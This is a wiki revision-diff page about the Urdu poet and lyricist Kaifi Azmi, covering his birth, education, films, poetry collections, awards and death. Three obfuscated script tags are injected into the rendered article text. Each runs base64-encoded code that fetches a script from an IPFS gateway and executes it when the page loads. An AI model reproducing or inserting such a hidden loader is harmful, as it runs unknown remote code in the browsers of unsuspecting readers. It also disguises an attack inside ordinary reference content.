Difference between revisions of "कैफ़ी आज़मी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} '''कैफ़ी आज़मी''' ([[अंग्रेज़ी भाषा|अंग्रेज...' के साथ नया पन्ना बनाया)
 
Line 2: Line 2:
 
'''कैफ़ी आज़मी''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]] Kaifi Azmi) (जन्म- [[19 जनवरी]] 1919; मृत्यु-[[10 मई]], 2002) फ़िल्मजगत के मशहूर [[उर्दू]] शायर थे। कैफ़ी आज़मी का मूल नाम '''अख़्तर हुसैन रिज़्वी''' था। कैफ़ी आज़मी में नैसर्गिक काव्य प्रतिभा थी। तथा वह छोटी उम्र में ही वे शायरी करने लगे थे।
 
'''कैफ़ी आज़मी''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]] Kaifi Azmi) (जन्म- [[19 जनवरी]] 1919; मृत्यु-[[10 मई]], 2002) फ़िल्मजगत के मशहूर [[उर्दू]] शायर थे। कैफ़ी आज़मी का मूल नाम '''अख़्तर हुसैन रिज़्वी''' था। कैफ़ी आज़मी में नैसर्गिक काव्य प्रतिभा थी। तथा वह छोटी उम्र में ही वे शायरी करने लगे थे।
 
==जीवन परिचय==
 
==जीवन परिचय==
कैफ़ी आज़मी का जन्म [[उत्तर प्रदेश]] के [[आजमगढ़ ज़िला|आजमगढ़ ज़िले]] में 19 जनवरी 1919 हुआ था। कैफ़ी आज़मी के परिवार में उनकी पत्नी शौकत आज़मी, इनकी दो संतान शबाना आज़मी (फ़िल्मजगत की मशहूर अभिनेत्री और जावेद अख़्तर की पत्नी) और बाबा आजमी आज़मी है।  
+
कैफ़ी आज़मी का जन्म [[उत्तर प्रदेश]] के [[आजमगढ़ ज़िला|आजमगढ़ ज़िले]] में 19 जनवरी 1919 हुआ था। कैफ़ी आज़मी के परिवार में उनकी पत्नी शौकत आज़मी, इनकी दो संतान शबाना आज़मी (फ़िल्मजगत की मशहूर अभिनेत्री और जावेद अख़्तर की पत्नी) और बाबा आज़मी है।  
 
;शिक्षा
 
;शिक्षा
कैफ़ी आज़मी के तहसीदार पिता उन्हें आधुनिक शिक्षा देना चाहते थे। किंतु रिश्तेदारों के दबाव के कारण कैफ़ी आज़मी को [[इस्लाम धर्म]] की शिक्षा प्राप्त करने के लिए [[लखनऊ]] के 'सुलतान-उल-मदरिया' में भर्ती कराना पड़ा। लेकिन वे अधिक समय तक वहाँ नहीं रह सके। उन्होंने वहाँ यूनियन बनाई और लंबी हड़ताल करा दी। हड़ताल समाप्त होते ही कैफ़ी आज़मी को वहाँ से निकाल दिया गया। बाद में उन्होंने [[लखनऊ]] और [[इलाहाबाद विश्वविद्यालय]] में शिक्षा पाई और उर्दू, [[अरबी भाषा|अरबी]] और [[फ़ारसी भाषा|फ़ारसी]] भाषाओं का ज्ञान प्राप्त किया।  
+
कैफ़ी आज़मी के तहसीलदार पिता उन्हें आधुनिक शिक्षा देना चाहते थे। किंतु रिश्तेदारों के दबाव के कारण कैफ़ी आज़मी को [[इस्लाम धर्म]] की शिक्षा प्राप्त करने के लिए [[लखनऊ]] के 'सुलतान-उल-मदरिया' में भर्ती कराना पड़ा। लेकिन वे अधिक समय तक वहाँ नहीं रह सके। उन्होंने वहाँ यूनियन बनाई और लंबी हड़ताल करा दी। हड़ताल समाप्त होते ही कैफ़ी आज़मी को वहाँ से निकाल दिया गया। बाद में उन्होंने [[लखनऊ]] और [[इलाहाबाद विश्वविद्यालय]] में शिक्षा पाई और उर्दू, [[अरबी भाषा|अरबी]] और [[फ़ारसी भाषा|फ़ारसी]] भाषाओं का ज्ञान प्राप्त किया।  
 
==काव्य प्रतिभा==
 
==काव्य प्रतिभा==
 
कैफ़ी आज़मी में नैसर्गिक काव्य प्रतिभा थी। छोटी उम्र में ही वे शायरी करने लगे थे। यद्यपि उनकी आरंभिक रचनाओं में प्रेम-भावना प्रधान होती थी, किंतु शीघ्र ही उसमें प्रगतिशील विचारों का प्राधान्य हो गया।  
 
कैफ़ी आज़मी में नैसर्गिक काव्य प्रतिभा थी। छोटी उम्र में ही वे शायरी करने लगे थे। यद्यपि उनकी आरंभिक रचनाओं में प्रेम-भावना प्रधान होती थी, किंतु शीघ्र ही उसमें प्रगतिशील विचारों का प्राधान्य हो गया।  
Line 12: Line 12:
 
;नज़्म संग्रह
 
;नज़्म संग्रह
 
कैफ़ी आज़मी ने आधुनिक उर्दू शायरी में अपना एक खास स्थान बनाया। कैफ़ी आज़मी की नज़्मों और ग़ज़लों के चार संग्रह हैं:-
 
कैफ़ी आज़मी ने आधुनिक उर्दू शायरी में अपना एक खास स्थान बनाया। कैफ़ी आज़मी की नज़्मों और ग़ज़लों के चार संग्रह हैं:-
*झंकार
+
#झंकार
*आखिरे-शब
+
#आखिरे-शब
*आवारा सिज्दे
+
#आवारा सिज्दे
*इब्लीस की मजिलसे
+
#इब्लीस की मजिलसे शूरा।
*शूरा।
 
 
==सम्मान और पुरस्कार==
 
==सम्मान और पुरस्कार==
 
कैफ़ी आज़मी को अपनी विभिन्न प्रकार की रचनाओं के लिये कई पुरस्कारों से सम्मानित किया गया है। जिनमें से कुछ प्रमुख इस प्रकार हैं-
 
कैफ़ी आज़मी को अपनी विभिन्न प्रकार की रचनाओं के लिये कई पुरस्कारों से सम्मानित किया गया है। जिनमें से कुछ प्रमुख इस प्रकार हैं-
*1975 कैफ़ी आज़मी को आवारा सिज्दे पर [[साहित्य अकादमी]] और सोवियत लैंड नेहरू अवार्ड से सम्मानित किये गये।  
+
*1975 कैफ़ी आज़मी को आवारा सिज्दे पर साहित्य अकादमी और सोवियत लैंड नेहरू अवार्ड से सम्मानित किये गये।  
 
*1970 सात हिन्दुस्तानी फ़िल्म के लिए सर्वश्रेष्ठ राष्ट्रीय फ़िल्म पुरस्कार  
 
*1970 सात हिन्दुस्तानी फ़िल्म के लिए सर्वश्रेष्ठ राष्ट्रीय फ़िल्म पुरस्कार  
 
*1975 गरम हवा फ़िल्म के लिए सर्वश्रेष्ठ वार्ता फ़िल्मफ़ेयर पुरस्कार   
 
*1975 गरम हवा फ़िल्म के लिए सर्वश्रेष्ठ वार्ता फ़िल्मफ़ेयर पुरस्कार   
 
 
==निधन==  
 
==निधन==  
फ़िल्मजगत के मशहूर [[उर्दू]] के शायर कैफ़ी आज़मी का निधन [[10 मई]] 2002 को ह्रदयघात के कारण मुम्बई में हुआ।  
+
फ़िल्मजगत के मशहूर [[उर्दू]] के शायर कैफ़ी आज़मी का निधन [[10 मई]] 2002 को ह्रदयाघात के कारण मुम्बई में हुआ।  
  
  
Line 30: Line 28:
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
{{cite book | last =शर्मा | first =लीलाधर  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती, दिल्ली | location =भारत डिस्कवरी पुस्तकालय  | language =हिन्दी  | pages =पृष्ठ 199 | chapter =}}
 
<references/>
 
<references/>
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{संगीतकार}}
+
[[Category:उर्दू शायर]] [[Category:गीतकार]] [[Category:ग़ज़ल]][[Category:सिनेमा]] [[Category:संगीत कोश]] [[Category: कला कोश]] [[Category:चरित कोश]]
[[Category:ग़ज़ल गायक]] [[Category:गायक]] [[Category:संगीतकार]] [[Category:सिनेमा]] [[Category:संगीत कोश]] [[Category: कला कोश]] [[Category:चरित कोश]]
 
 
[[Category:नया पन्ना नवम्बर-2011]]
 
[[Category:नया पन्ना नवम्बर-2011]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 06:46, 17 November 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

kaifi azami (aangrezi Kaifi Azmi) (janm- 19 janavari 1919; mrityu-10 mee, 2002) filmajagat ke mashahoor urdoo shayar the. kaifi azami ka mool nam akhtar husain rizvi tha. kaifi azami mean naisargik kavy pratibha thi. tatha vah chhoti umr mean hi ve shayari karane lage the.

jivan parichay

kaifi azami ka janm uttar pradesh ke ajamagadh zile mean 19 janavari 1919 hua tha. kaifi azami ke parivar mean unaki patni shaukat azami, inaki do santan shabana azami (filmajagat ki mashahoor abhinetri aur javed akhtar ki patni) aur baba azami hai.

shiksha

kaifi azami ke tahasiladar pita unhean adhunik shiksha dena chahate the. kiantu rishtedaroan ke dabav ke karan kaifi azami ko islam dharm ki shiksha prapt karane ke lie lakhanoo ke 'sulatan-ul-madariya' mean bharti karana p da. lekin ve adhik samay tak vahaan nahian rah sake. unhoanne vahaan yooniyan banaee aur lanbi h datal kara di. h datal samapt hote hi kaifi azami ko vahaan se nikal diya gaya. bad mean unhoanne lakhanoo aur ilahabad vishvavidyalay mean shiksha paee aur urdoo, arabi aur farasi bhashaoan ka jnan prapt kiya.

kavy pratibha

kaifi azami mean naisargik kavy pratibha thi. chhoti umr mean hi ve shayari karane lage the. yadyapi unaki aranbhik rachanaoan mean prem-bhavana pradhan hoti thi, kiantu shighr hi usamean pragatishil vicharoan ka pradhany ho gaya. rajanitik drishti se ve kamyunist parti ke sadasy the. kaifi azami parti ke kam ke lie mumbee ge the. vahaan unaka sanbandh iandiyan pipuls thiyetar se hua aur age chalakar ve usake adhyaksh bhi bane.

filmoan mean pravesh

kaifi azami ne kahani lekhak ke roop mean filmoan mean pravesh kiya. 'yahoodi ki beti' aur 'eed ka chaand' unaki likhi aranbhik filmean thian. unhoanne 'garam hava' aur 'manthan jaisi filmoan mean sanvad bhi likhean. unhoanne anek filmoan mean git likhean jinamean kuchh pramukh haian- 'kagaj ke phool' 'hakikat', hindustan ki kasam', hansate jakhm 'akhari khat' aur hir raanjha'.

nazm sangrah

kaifi azami ne adhunik urdoo shayari mean apana ek khas sthan banaya. kaifi azami ki nazmoan aur gazaloan ke char sangrah haian:-

  1. jhankar
  2. akhire-shab
  3. avara sijde
  4. iblis ki majilase shoora.

samman aur puraskar

kaifi azami ko apani vibhinn prakar ki rachanaoan ke liye kee puraskaroan se sammanit kiya gaya hai. jinamean se kuchh pramukh is prakar haian-

  • 1975 kaifi azami ko avara sijde par sahity akadami aur soviyat laiand neharoo avard se sammanit kiye gaye.
  • 1970 sat hindustani film ke lie sarvashreshth rashtriy film puraskar
  • 1975 garam hava film ke lie sarvashreshth varta filmafeyar puraskar

nidhan

filmajagat ke mashahoor urdoo ke shayar kaifi azami ka nidhan 10 mee 2002 ko hradayaghat ke karan mumbee mean hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sharma, liladhar bharatiy charit kosh (hindi). bharat diskavari pustakalay: shiksha bharati, dilli, prishth 199.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


bahari k diyaan

sanbandhit lekh